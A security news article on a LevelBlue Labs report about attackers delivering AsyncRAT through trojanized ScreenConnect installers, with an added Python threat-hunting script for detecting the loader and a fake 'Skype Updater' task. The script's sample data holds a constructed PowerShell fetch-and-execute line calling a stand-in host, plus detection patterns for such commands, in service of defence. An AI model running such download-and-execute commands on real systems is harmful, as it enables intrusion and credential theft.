LevelBlue Report: Attackers Using AsyncRAT To Steal Credentials

Hackers use AsyncRAT via fileless loaders in trojanized ScreenConnect installs to steal credentials, log keys, and hijack crypto wallets.

Written by Luis Millares
Sep 12, 2025

LevelBlue Labs has uncovered a campaign in which attackers deploy AsyncRAT, an open-source .NET Remote Access Trojan (RAT), through a fileless loader that masquerades as a legitimate tool. Once running, the malware steals user credentials, logs keystrokes, and siphons cryptocurrency wallet data.

Weaponizing trusted utilities to evade detection

The campaign was highlighted in LevelBlue Labs’ latest Threat Spotlight. Unlike traditional malware that writes its payload to disk, the loader decodes and runs its stages in memory; the researchers noted that this fileless delivery makes the threat harder to detect and to remediate, since there is no dropped executable for file-based scanning or forensic recovery to find.

The campaign’s initial entry point was a trojanized ScreenConnect installer. ScreenConnect, ConnectWise’s remote support and access platform, lets IT teams and MSPs connect to end-user devices for remote troubleshooting, maintenance, and IT support, which is exactly why a tampered installer is such an effective lure.

Here’s how the attack works:

  • Attackers gained initial access through a trojanized ScreenConnect installer, then executed a layered VBScript and PowerShell loader to fetch obfuscated payloads.
  • Persistence was maintained via a fake “Skype Updater” scheduled task, ensuring re-execution at every login.
  • AsyncRAT modules enabled credential theft, keylogging, clipboard hijacking, and wallet reconnaissance while evading detection through AMSI and ETW bypass techniques.

LevelBlue’s researchers warned that malicious actors are increasingly weaponizing trusted tools, such as PowerShell and WScript, to execute undetected attacks and steal sensitive information.
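The three-step chain above (script host to PowerShell loader, look-alike scheduled task at logon, trusted binaries doing the work) is visible in ordinary endpoint telemetry. The following Python is an added example written for this article, not code from LevelBlue or from the report; it runs the kind of hunting logic the report recommends over a handful of constructed records that mimic Sysmon process-creation (Event ID 1) and Windows scheduled-task-creation (Event ID 4698) fields. The event field names, the base64 payload, the "example.invalid" host and the task XML are all assumptions made for the example.

```python
"""Hunt for a WScript -> PowerShell fileless loader and a look-alike
scheduled task, the pattern described for the AsyncRAT campaign.

Example code only; the records in SAMPLE_EVENTS are constructed for this
article and are not telemetry from the LevelBlue report.
"""
import base64
import re

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe"}
SHELLS = {"powershell.exe", "pwsh.exe"}
# Directories a vendor "updater" has no business running from.
USER_WRITABLE = re.compile(r"(?i)\\(appdata|temp|public|programdata)\\")
# Vendor names commonly borrowed for persistence task names (assumed list).
LOOKALIKE_NAMES = re.compile(r"(?i)skype|teams|chrome|adobe|onedrive")

# Constructed stage-2 fetch, encoded the way PowerShell expects (-enc takes
# base64 of UTF-16LE). Built at import time so the sample is always valid.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode("ascii")

SAMPLE_EVENTS = [
    {"EventID": 1, "ParentImage": r"C:\Windows\System32\wscript.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"EventID": 1, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe Get-Service"},
    {"EventID": 4698, "TaskName": r"\Skype Updater",
     "TaskContent": "<Task><Triggers><LogonTrigger/></Triggers><Actions><Exec>"
                    "<Command>wscript.exe</Command>"
                    "<Arguments>C:\\Users\\Public\\update.vbs</Arguments>"
                    "</Exec></Actions></Task>"},
    {"EventID": 4698, "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": "<Task><Triggers><CalendarTrigger/></Triggers><Actions><Exec>"
                    "<Command>%windir%\\system32\\defrag.exe</Command>"
                    "</Exec></Actions></Task>"},
]


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if absent/invalid."""
    m = re.search(r"(?i)-(?:enc|e|ec|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def check_process_event(evt):
    """Reasons a process-creation record looks like the script-host loader."""
    reasons = []
    parent = evt.get("ParentImage", "").lower().rsplit("\\", 1)[-1]
    image = evt.get("Image", "").lower().rsplit("\\", 1)[-1]
    cmd = evt.get("CommandLine", "")
    if parent in SCRIPT_HOSTS and image in SHELLS:
        reasons.append(f"{parent} spawned {image}")
    if image in SHELLS:
        if re.search(r"(?i)-w(?:indowstyle)?\s+hidden", cmd):
            reasons.append("hidden window")
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            reasons.append("encoded command")
            # Decoded stage that downloads or evals more code is the fileless tell.
            if re.search(r"(?i)\b(iex|invoke-expression|downloadstring|frombase64string)\b", decoded):
                reasons.append("decoded payload fetches/executes remote content")
    return reasons


def check_task_event(evt):
    """Reasons a scheduled-task record looks like look-alike persistence."""
    reasons = []
    name = evt.get("TaskName", "")
    content = evt.get("TaskContent", "")
    low = content.lower()
    if LOOKALIKE_NAMES.search(name) and USER_WRITABLE.search(content):
        reasons.append(f"'{name}' runs from a user-writable path")
    if any(h in low for h in SCRIPT_HOSTS | SHELLS):
        reasons.append("task action is a script host or PowerShell")
    if "logontrigger" in low:
        reasons.append("logon trigger")
    return reasons


def hunt(events):
    """Return [(index, reasons)] for every record that matches the chain."""
    hits = []
    for i, evt in enumerate(events):
        if evt.get("EventID") == 1:
            reasons = check_process_event(evt)
        elif evt.get("EventID") == 4698:
            reasons = check_task_event(evt)
        else:
            reasons = []
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in hunt(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].get("CommandLine") or SAMPLE_EVENTS[idx].get("TaskName"))
        for r in why:
            print("   -", r)
```

Run against the constructed records, only the wscript-spawned hidden encoded PowerShell and the "Skype Updater" logon task are flagged; the interactive `Get-Service` and the built-in defrag task are not. Two caveats a practitioner should keep in mind: the AMSI and ETW bypasses the report mentions are not modeled here (they show up as tampering with the PowerShell host, not in these fields), and in a real ScreenConnect-based intrusion the first parent of the VBScript will be the installer itself, so add that parent-child pair to the rule once you have the hash or path from your own telemetry.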

The report closed by emphasizing the importance of sharing threat intelligence to keep pace with evolving tactics and malware.

“Sharing these behaviors and techniques with internal teams allows for proactive threat hunting, enabling defenders to recognize patterns, anticipate attacker evolution, and improve investigative focus — all of which ultimately advance both detection and response capabilities,” the report said.

Proactively managing risks: what organizations need to do to stay secure

In parallel with hackers weaponizing trusted tools in attack campaigns, LevelBlue’s recently released Data Accelerator: Software Supply Chain and Cybersecurity report highlighted a broader trend of inadequate visibility among organizations in managing third-party threats.

That report found organizations broadly exposed to supply chain attacks: nearly half of those surveyed (49%) acknowledged that they lack the visibility needed to accurately detect and manage risks within their third-party ecosystems.

In response, Theresa Lanowitz, chief evangelist at LevelBlue, advised organizations to apply “security-focused KPIs” to every leader, regardless of their function.

“There has to be some responsibility internally around managing risk, and if everybody has to think about security within their goals, then they’ll naturally start to consider how they interact with third-party tools and what that means for the overall security of the organization,” Lanowitz told Channel Insider in July.

In July, LevelBlue entered a strategic partnership with UK-based channel development firm Kompigo. Read our coverage of the agreement and how it helps expand security services for MSPs and MSSPs within the region.


Luis Millares has extensive experience reviewing virtual private networks (VPNs), password managers, and other security software. He has tested and reviewed numerous forms of tech, covering consumer technology like smartphones and laptops, all the way to enterprise software and cybersecurity products. He has authored over 450 online articles on technology and has worked for the leading tech journalism site in the Philippines, YugaTech.com. He currently contributes to the Daily Tech Insider newsletter, providing well-researched insights and coverage of the latest in technology.

Property of TechnologyAdvice. © 2025 TechnologyAdvice. All Rights Reserved

Advertiser Disclosure: Some of the products that appear on this site are from companies from which TechnologyAdvice receives compensation. This compensation may impact how and where products appear on this site including, for example, the order in which they appear. TechnologyAdvice does not include all companies or all types of products available in the marketplace.